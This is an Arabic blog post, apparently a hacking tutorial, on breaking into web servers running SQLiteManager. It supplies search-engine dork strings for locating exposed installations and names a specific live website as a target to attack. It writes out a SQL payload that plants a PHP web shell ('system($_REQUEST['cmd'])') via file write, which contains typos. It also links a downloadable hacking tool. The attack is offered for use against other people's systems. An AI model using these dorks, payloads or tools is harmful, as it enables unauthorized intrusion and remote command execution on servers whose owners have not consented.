تجربه السكربت SQLiteManager من المصدر معي الثغره الموجوده

مشاهدات الان
طريقه البحث :
SQLite version 3.8.2 / PHP version 5.5.9-1ubuntu4.13
Welcome to SQLiteManager version 1.2.4
Welcome to SQLiteManager version 1.0.1
intext:SQLiteManager inurl:main.php
SQLite version 2.8.11 / PHP version 4.3.9
/SQLiteManager-1.2.4/spaw/config/spaw_control.config

وعندكم هذي المواقع لتطبيق عليها بالاختراق <<<
http://www2.wamwam.co.jp/sqlite/main.php
مني لكم عند وجود مثل هذي الصوره يمكنك فتح قاعده وتضيف ما تحب بطريقتك الخاصه للاختراق كمثال
Create or add new database إنشاء قاعدة بيانات جديدة أو إضافتها : - تجريب رفع الكود وتأكد من الرابط ... D:\xampp ... cmd.php
=================================
SELECT "<? system($_REQUEST['cmd']); ?>"
INTO OUTFIIE "D:\xampp\htdocs\myaite\cmd.php"
شرح فيديو
https://youtu.be/iAVRoARA7vM

=================تم الاختراق بواسطه الثغره================
ميزات :إدارة العديد من قواعد البيانات (إنشاء، الوصول أو تحميل)
إدارة قواعد البيانات المرفقة
إنشاء وتحرير وحذف الجداول والفهارس
إينزيرت، تحرير، حذف السجلات في هذه الجداول
إدارة العرض، وإمكانيات إنشاء عرض من سيليكت
إدارة الزناد
إدارة وظائف المستخدمين المعرفة، وهذه الوظائف هي في استمرار استخدامها في دليل الطلبات، كما في شكل إدراج / تعديل البيانات
طلب يدوي ومن ملف، فمن الممكن من تحديد شكل الطلبات، سكليت أو الخلية. يقوم التحويل من أجل استيراد قاعدة ميسكل مباشرة في سكليت
استيراد السجلات من ملف نصي منسق
تصدير الهيكل والبيانات
اختيار عدة عرض الجلد
المصدر
http://www.sqlitemanager.org/
صوره

وهذا برنامج عنيف ومميز في الاختراق لعده طرق
http://www.mediafire.com/file/hbb496x61y59xus/Sculptor-V1.1.zip
http://hkrkoz9.blogspot.com/2018/08/sculptor.html
وسلامتكم

إرسال تعليق

أحدث أقدم